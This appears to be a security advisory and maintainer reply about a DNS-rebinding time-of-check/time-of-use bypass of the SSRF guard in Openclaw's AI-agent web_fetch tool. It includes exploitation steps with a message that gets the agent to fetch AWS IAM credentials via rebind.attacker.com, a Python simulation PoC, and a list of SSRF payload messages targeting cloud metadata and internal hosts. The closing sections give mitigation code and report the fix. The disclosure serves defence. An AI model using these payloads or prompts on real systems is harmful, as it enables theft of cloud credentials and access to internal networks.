| Attribute | Value |
|---|---|
| Vulnerability Type | CWE-918: Server-Side Request Forgery (SSRF) |
| Severity | 🟡 Medium |
| CVSS 3.1 Base Score | 5.3 (Medium) |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
| Affected Versions | All versions (as of audit date) |
| Attack Vector | Network |
| Attack Complexity | High (requires DNS control) |
Openclaw's web_fetch tool allows AI agents to fetch URL content. Although the project implements SSRF protection (blocking private IPs and special domain names), there exists a DNS Rebinding TOCTOU (Time-of-Check to Time-of-Use) vulnerability.
A time window exists between the security check (assertPublicHostname) and the actual HTTP request (fetch), which attackers can exploit using DNS rebinding to bypass the check.
| Condition | Description | Difficulty |
|---|---|---|
| ① Messaging channel access | Attacker can send messages to the bot | Medium |
| ② AI model cooperation | Model invokes web_fetch to retrieve attacker URL | Medium |
| ③ DNS server control | Attacker controls domain's DNS server | High |
| ④ Precise timing control | DNS record must switch after check but before request | High |
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOURCE: AI Tool Call Parameters │
├─────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:575-598 │
│ │
│ execute: async (_toolCallId, args) => { │
│ const url = readStringParam(params, "url", { required: true }); │
│ // url comes from AI model decision, can be influenced by user message │
│ // User message: "Please fetch content from http://rebind.attacker.com/secret" │
└──────────────────────────────────┬──────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────────────────────┐
│ SECURITY GATE: SSRF Protection Check │
├──────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:176-198 fetchWithRedirects() │
│ │
│ async function fetchWithRedirects(...) { │
│ // Step 1: DNS resolution and IP check (T1) │
│ await assertPublicHostname(parsedUrl.hostname); // ← DNS query #1 │
│ // ⚠️ Time window begins - attacker can switch DNS record here │
│ │
│ src/infra/net/ssrf.ts:104-131 assertPublicHostname() │
│ → isBlockedHostname() checks blacklisted domain names │
│ → isPrivateIpAddress() checks private IPs │
│ → dns.lookup() resolves domain name │
│ → Checks if resolved IP is a private address │
└──────────────────────────────────┬───────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────────────────────┐
│ SINK: HTTP Request Execution │
├──────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:187-189 │
│ │
│ // Step 2: Actual HTTP request (T2) │
│ const res = await fetch(parsedUrl.toString(), { │
│ method: "GET", │
│ redirect: "manual", // Handle redirects manually │
│ signal, │
│ }); │
│ // ⚠️ fetch() internally performs DNS resolution again! │
│ // If attacker switched DNS record between T1 and T2, │
│ // request may go to different IP (e.g., 169.254.169.254) │
└──────────────────────────────────────────────────────────────────────────────┘
File: src/agents/tools/web-fetch.ts
// Lines 575-598
execute: async (_toolCallId, args, signal) => {
const params = args as {
url: string;
prompt?: string;
// ...
};
const url = readStringParam(params, "url", { required: true }); // ← SOURCE
// ...
const result = await fetchWithRedirects({
url, // ← Passed to fetchWithRedirects
// ...
});
}File: src/agents/tools/web-fetch.ts
// Lines 165-221
async function fetchWithRedirects(params: {
url: string;
// ...
}): Promise<...> {
// ...
while (true) {
const parsedUrl = new URL(currentUrl);
// SSRF check (T1 - DNS query #1)
await assertPublicHostname(parsedUrl.hostname);
// ⚠️ TOCTOU window - DNS may change here
// Actual request (T2 - may trigger DNS query #2)
const res = await fetch(parsedUrl.toString(), { // ← SINK
method: "GET",
redirect: "manual",
signal,
});
// ...
}
}File: src/infra/net/ssrf.ts
// Lines 104-131
export async function assertPublicHostname(
hostname: string,
lookupFn: typeof lookup = lookup
): Promise<void> {
const normalized = hostname.toLowerCase().trim();
// Check blacklisted domain names
if (isBlockedHostname(normalized)) {
throw new SsrFBlockedError(`Blocked hostname: ${normalized}`);
}
// Check if it's a private IP literal
if (isPrivateIpAddress(normalized)) {
throw new SsrFBlockedError(`Private IP address: ${normalized}`);
}
// DNS resolution and check results
const results = await lookupFn(normalized, { all: true }); // ← DNS query
for (const entry of results) {
if (isPrivateIpAddress(entry.address)) {
throw new SsrFBlockedError(
`DNS resolves to private IP: ${entry.address}`
);
}
}
// ⚠️ Check passed at this point, but fetch() may use different DNS result
}Timeline:
────────────────────────────────────────────────────────────────────
T1: assertPublicHostname("rebind.attacker.com")
│
├── DNS query: rebind.attacker.com
│ └── Attacker DNS returns: 93.184.216.34 (public IP)
│
└── Check passes ✓
T2: Attacker quickly switches DNS record
│
└── rebind.attacker.com → 169.254.169.254 (AWS metadata)
T3: fetch("http://rebind.attacker.com/...")
│
├── Node.js internal DNS query (may use new record)
│ └── Resolves to: 169.254.169.254
│
└── Request sent to AWS metadata service!
────────────────────────────────────────────────────────────────────
-
Prepare DNS server:
- Control DNS for domain
rebind.attacker.com - Set TTL = 0 (disable caching)
- Configure DNS server to alternate between public IP and target internal IP
- Control DNS for domain
-
Send attack message:
Please help me fetch content from: http://rebind.attacker.com/latest/meta-data/iam/security-credentials/ -
DNS Rebinding timing:
- First DNS query (security check): Returns public IP → passes
- Second DNS query (fetch): Returns 169.254.169.254 → request goes to metadata
-
Obtain results:
- AI returns AWS IAM credentials to attacker
#!/usr/bin/env python3
"""
Openclaw SSRF Vulnerability POC
This POC demonstrates the SSRF protection mechanism and DNS Rebinding attack principle.
Usage:
python3 poc_ssrf.py
Note:
Actual DNS Rebinding exploitation requires control of a DNS server.
This POC only demonstrates the protection mechanism and theoretical attack flow.
"""
import socket
import ipaddress
from urllib.parse import urlparse
from typing import List, Dict, Optional, Tuple
import time
# SSRF protection logic copied from src/infra/net/ssrf.ts
BLOCKED_HOSTNAMES = {
"localhost",
"metadata.google.internal",
"metadata.google",
"169.254.169.254",
"[::1]",
}
PRIVATE_IPV6_PREFIXES = ["fe80:", "fec0:", "fc", "fd"]
def is_private_ipv4(ip: str) -> bool:
"""Check if it's a private IPv4 address"""
try:
addr = ipaddress.IPv4Address(ip)
return (
addr.is_private or
addr.is_loopback or
addr.is_link_local or
addr.is_reserved
)
except ipaddress.AddressValueError:
return False
def is_private_ipv6(ip: str) -> bool:
"""Check if it's a private IPv6 address"""
normalized = ip.lower()
# Check known private prefixes
for prefix in PRIVATE_IPV6_PREFIXES:
if normalized.startswith(prefix):
return True
# IPv6-mapped IPv4
if normalized.startswith("::ffff:"):
ipv4_part = normalized[7:]
if is_private_ipv4(ipv4_part):
return True
# Loopback
if normalized == "::1":
return True
try:
addr = ipaddress.IPv6Address(ip)
return addr.is_private or addr.is_loopback or addr.is_link_local
except ipaddress.AddressValueError:
return False
def is_private_ip_address(ip: str) -> bool:
"""Check if it's a private IP address"""
if ":" in ip:
return is_private_ipv6(ip)
return is_private_ipv4(ip)
def is_blocked_hostname(hostname: str) -> bool:
"""Check if hostname is blocked"""
normalized = hostname.lower().strip()
if normalized in BLOCKED_HOSTNAMES:
return True
if normalized.endswith(".localhost"):
return True
if normalized.endswith(".local"):
return True
if normalized.endswith(".internal"):
return True
return False
def dns_lookup(hostname: str) -> List[Tuple[str, int]]:
"""Perform DNS lookup"""
try:
results = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC)
ips = []
seen = set()
for result in results:
ip = result[4][0]
family = result[0]
if ip not in seen:
seen.add(ip)
ips.append((ip, family))
return ips
except socket.gaierror as e:
raise Exception(f"DNS lookup failed: {e}")
def assert_public_hostname(hostname: str) -> Dict:
"""
Simulates src/infra/net/ssrf.ts assertPublicHostname()
Returns check result
"""
normalized = hostname.lower().strip()
# Step 1: Check blacklisted domain names
if is_blocked_hostname(normalized):
return {
"blocked": True,
"reason": f"Blocked hostname: {normalized}",
"resolved": None
}
# Step 2: Check if it's a private IP literal
if is_private_ip_address(normalized):
return {
"blocked": True,
"reason": f"Private IP address: {normalized}",
"resolved": None
}
# Step 3: DNS resolution and check results
try:
resolved = dns_lookup(normalized)
for ip, family in resolved:
if is_private_ip_address(ip):
return {
"blocked": True,
"reason": f"DNS resolves to private IP: {ip}",
"resolved": [r[0] for r in resolved]
}
return {
"blocked": False,
"reason": None,
"resolved": [r[0] for r in resolved]
}
except Exception as e:
return {
"blocked": True,
"reason": str(e),
"resolved": None
}
class DnsRebindingSimulator:
"""Simulates DNS Rebinding attack"""
def __init__(self, domain: str):
self.domain = domain
self.query_count = 0
self.public_ip = "93.184.216.34" # example.com
self.target_ip = "169.254.169.254" # AWS metadata
def lookup(self, hostname: str) -> List[Tuple[str, int]]:
"""Simulate DNS query, alternating between different IPs"""
self.query_count += 1
if self.query_count == 1:
# First query (security check): Return public IP
print(f" [DNS Query #{self.query_count}] {hostname} → {self.public_ip} (public)")
return [(self.public_ip, socket.AF_INET)]
else:
# Subsequent queries (actual request): Return target IP
print(f" [DNS Query #{self.query_count}] {hostname} → {self.target_ip} (REBIND!)")
return [(self.target_ip, socket.AF_INET)]
def simulate_attack(self):
"""Simulate complete DNS Rebinding attack"""
print(f"\n[*] Simulating DNS Rebinding attack on {self.domain}")
print(f" Target: AWS metadata at {self.target_ip}")
print()
# Simulate assertPublicHostname check
print("[1] Security check (assertPublicHostname):")
result = self._check_with_mock_dns()
if result["blocked"]:
print(f" ✗ Blocked: {result['reason']}")
return False
print(f" ✓ Allowed (resolved to {result['resolved']})")
# Simulate time window
print("\n[2] Time window (attacker changes DNS):")
print(f" DNS now points {self.domain} → {self.target_ip}")
# Simulate fetch request
print("\n[3] HTTP fetch (uses new DNS):")
fetch_ip = self.lookup(self.domain)[0][0]
if fetch_ip == self.target_ip:
print(f"\n 🔴 SSRF SUCCESS!")
print(f" Request sent to {self.target_ip} (AWS metadata)")
print(f" Attacker can now access: /latest/meta-data/iam/security-credentials/")
return True
else:
print(f" Request sent to {fetch_ip}")
return False
def _check_with_mock_dns(self) -> Dict:
"""Execute security check using mock DNS"""
normalized = self.domain.lower().strip()
if is_blocked_hostname(normalized):
return {"blocked": True, "reason": f"Blocked hostname", "resolved": None}
resolved = self.lookup(normalized)
for ip, _ in resolved:
if is_private_ip_address(ip):
return {"blocked": True, "reason": f"Private IP: {ip}", "resolved": None}
return {"blocked": False, "resolved": [r[0] for r in resolved]}
def test_ssrf_protection():
"""Test SSRF protection mechanism"""
print("=" * 80)
print("Openclaw SSRF Protection Test")
print("=" * 80)
print()
test_cases = [
# Should be blocked
("localhost", True, "localhost"),
("127.0.0.1", True, "loopback IP"),
("::1", True, "IPv6 loopback"),
("169.254.169.254", True, "AWS metadata IP"),
("metadata.google.internal", True, "GCP metadata"),
("10.0.0.1", True, "Private 10.x"),
("192.168.1.1", True, "Private 192.168.x"),
("172.16.0.1", True, "Private 172.16.x"),
("evil.localhost", True, ".localhost suffix"),
("app.local", True, ".local suffix"),
# Should be allowed (but may be attacked via DNS rebinding)
("example.com", False, "Public domain"),
("google.com", False, "Public domain"),
]
passed = 0
failed = 0
for hostname, should_block, desc in test_cases:
result = assert_public_hostname(hostname)
blocked = result["blocked"]
status = "✓" if blocked == should_block else "✗"
blocked_str = "BLOCKED" if blocked else "ALLOWED"
if blocked == should_block:
passed += 1
else:
failed += 1
print(f"{status} [{blocked_str}] {desc}: {hostname}")
if result["reason"]:
print(f" Reason: {result['reason']}")
if result["resolved"]:
print(f" Resolved: {', '.join(result['resolved'][:3])}")
print()
print(f"Results: {passed} passed, {failed} failed")
return passed, failed
def test_dns_rebinding():
"""Test DNS Rebinding attack"""
print()
print("=" * 80)
print("DNS Rebinding Attack Simulation")
print("=" * 80)
simulator = DnsRebindingSimulator("rebind.attacker.com")
success = simulator.simulate_attack()
print()
print("=" * 80)
print("ATTACK ANALYSIS")
print("=" * 80)
print(f"""
VULNERABILITY: TOCTOU (Time-of-Check to Time-of-Use) in SSRF protection
AFFECTED CODE:
src/agents/tools/web-fetch.ts:176-198 fetchWithRedirects()
async function fetchWithRedirects(...) {{
await assertPublicHostname(hostname); // T1: DNS check
// ⚠️ WINDOW: DNS can change here
const res = await fetch(url, ...); // T2: May use different DNS
}}
ATTACK REQUIREMENTS:
1. Attacker controls a DNS server
2. DNS TTL set to 0 (or very low)
3. Precise timing to change DNS between T1 and T2
4. Target service accessible from Openclaw host
PRACTICAL DIFFICULTY: HIGH
- Node.js has internal DNS caching
- Timing is difficult to control
- Requires custom DNS infrastructure
POTENTIAL TARGETS:
- AWS metadata: 169.254.169.254
- GCP metadata: metadata.google.internal
- Azure metadata: 169.254.169.254
- Kubernetes API: kubernetes.default.svc
- Internal services: 10.x.x.x, 192.168.x.x
""")
def test_nip_io():
"""Test nip.io-style services (correctly blocked)"""
print()
print("=" * 80)
print("Testing nip.io-style DNS services")
print("=" * 80)
print()
nip_hosts = [
"127.0.0.1.nip.io",
"169.254.169.254.nip.io",
"10.0.0.1.nip.io",
"192.168.1.1.nip.io",
]
for host in nip_hosts:
result = assert_public_hostname(host)
blocked = result["blocked"]
status = "✓ BLOCKED" if blocked else "✗ ALLOWED"
print(f"{status}: {host}")
if result["resolved"]:
print(f" Resolved: {', '.join(result['resolved'])}")
if result["reason"]:
print(f" Reason: {result['reason']}")
print()
print("NOTE: nip.io services are correctly blocked by DNS resolution check")
def generate_ssrf_payloads():
"""Generate SSRF attack payloads"""
print()
print("=" * 80)
print("SSRF ATTACK PAYLOADS")
print("=" * 80)
print()
payloads = [
{
"target": "AWS Metadata",
"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"message": "Please fetch and summarize the content from http://169.254.169.254/latest/meta-data/",
"note": "Directly blocked by IP check"
},
{
"target": "GCP Metadata",
"url": "http://metadata.google.internal/computeMetadata/v1/",
"message": "Fetch http://metadata.google.internal/computeMetadata/v1/project/project-id",
"note": "Blocked by hostname blacklist"
},
{
"target": "DNS Rebinding (theoretical)",
"url": "http://rebind.attacker.com/latest/meta-data/iam/security-credentials/",
"message": "Please analyze the API response from http://rebind.attacker.com/api/v1/data",
"note": "Requires attacker-controlled DNS with TTL=0"
},
{
"target": "Internal Network Scan",
"url": "http://10.0.0.1:8080/admin",
"message": "Check if http://10.0.0.1:8080/ is accessible",
"note": "Blocked by private IP check"
},
]
for p in payloads:
print(f"[{p['target']}]")
print(f" URL: {p['url']}")
print(f" Message: {p['message']}")
print(f" Status: {p['note']}")
print()
if __name__ == "__main__":
test_ssrf_protection()
test_nip_io()
test_dns_rebinding()
generate_ssrf_payloads()-
Use resolved IP for direct requests:
// Instead of using hostname, use resolved IP directly const resolvedIps = await lookup(hostname, { all: true }); const safeIp = resolvedIps.find(ip => !isPrivateIpAddress(ip.address)); if (!safeIp) throw new SsrfBlockedError(...); // Make request using IP instead of hostname const url = new URL(originalUrl); url.hostname = safeIp.address; await fetch(url, { headers: { Host: originalHostname } });
-
Implement DNS pinning:
// Cache DNS results and verify at connection time const agent = new http.Agent({ lookup: (hostname, options, callback) => { // Use pre-validated IP callback(null, preResolvedIp, 4); } });
-
Socket-level IP validation:
// Validate target IP at TCP connection establishment socket.on('connect', () => { const remoteIp = socket.remoteAddress; if (isPrivateIpAddress(remoteIp)) { socket.destroy(); throw new SsrfBlockedError(...); } });
-
Disable DNS caching or use longer TTL:
// Ensure DNS results remain consistent during request dns.setDefaultResultOrder('ipv4first'); // Use local DNS cache
- OWASP SSRF: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- DNS Rebinding Attacks: https://en.wikipedia.org/wiki/DNS_rebinding
- Fix & Acknowledgement: https://github.com/openclaw/openclaw/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505#diff-06572a96a58dc510037d5efa622f9bec8519bc1beab13c9f251e97e657a9d4edR44
On #2 that is correct. I fixed the DNS-rebinding TOCTOU issue on main in commit b623557a2 (2026‑01‑26).
The SSRF guard now resolves and pins DNS results, and the subsequent request uses a pinned lookup (undici dispatcher / http(s) lookup) so no second DNS resolution can diverge. Redirects re-resolve and pin per hop. We also added pinning tests to prevent regressions. This closes the rebinding window described in Vulnerability 2.
I never worked on bigger open source projects before nor do I have experience with CVSS and I’m absolutely drowning in pings on every channel.
Will focus on getting an update out today.
I think this classifies as CWE-918 (Server-Side Request Forgery / SSRF), CVSS 3.1 Base 5.3 (Medium) but need more time to understand this in detail.
thanks,
Peter